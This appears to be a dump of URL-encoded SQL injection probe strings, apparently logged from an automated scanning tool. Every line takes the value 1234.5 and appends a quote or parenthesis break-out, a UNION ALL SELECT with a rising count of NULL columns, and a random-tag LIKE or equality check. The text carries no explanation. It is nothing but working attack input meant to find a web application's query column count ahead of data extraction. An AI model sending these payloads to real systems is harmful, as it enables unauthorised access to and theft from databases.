1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27myXb%27%20LIKE%20%27myXb 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27VPuq%27%20LIKE%20%27VPuq 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27QGju%27%20LIKE%20%27QGju 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27iQDs%27%20LIKE%20%27iQDs 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%27ZUTP%27%20LIKE%20%27ZUTP 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27AkWp%27%20LIKE%20%27AkWp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ZnEX%27%20LIKE%20%27ZnEX 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27oNIy%27%20LIKE%20%27oNIy 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27UwDp%27%20LIKE%20%27UwDp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27hMYs%27%20LIKE%20%27hMYs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27jpHc%27%20LIKE%20%27jpHc 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27ZzYC%27%20LIKE%20%27ZzYC 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27XCcq%27%20LIKE%20%27XCcq 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27knCu%27%20LIKE%20%27knCu 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%27FisM%27%20LIKE%20%27FisM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27muGW%27%20LIKE%20%27muGW 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27GiCB%27%20LIKE%20%27GiCB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27NFja%27%20LIKE%20%27NFja 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27ownf%27%20LIKE%20%27ownf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27UuNH%27%20LIKE%20%27UuNH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27yHRt%27%20LIKE%20%27yHRt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27kbaz%27%20LIKE%20%27kbaz 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27mjBH%27%20LIKE%20%27mjBH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27wMfT%27%20LIKE%20%27wMfT 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27QvAU%27%20LIKE%20%27QvAU 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27GDOs%27%20LIKE%20%27GDOs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27KuoV%27%20LIKE%20%27KuoV 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Yzzk%27%20LIKE%20%27Yzzk 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27bFLW%27%20LIKE%20%27bFLW 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27RfJr%27%20LIKE%20%27RfJr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27neNW%27%20LIKE%20%27neNW 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27zrYN%27%20LIKE%20%27zrYN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27QfPj%27%20LIKE%20%27QfPj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27TQrb%27%20LIKE%20%27TQrb 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27vJml%27%20LIKE%20%27vJml 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22WzNw%22%3D%22WzNw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22AcvJ%22%3D%22AcvJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22bJtE%22%3D%22bJtE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22KXUJ%22%3D%22KXUJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22usdQ%22%3D%22usdQ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22SUTz%22%3D%22SUTz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22XkCV%22%3D%22XkCV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22CiuD%22%3D%22CiuD 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22quZg%22%3D%22quZg 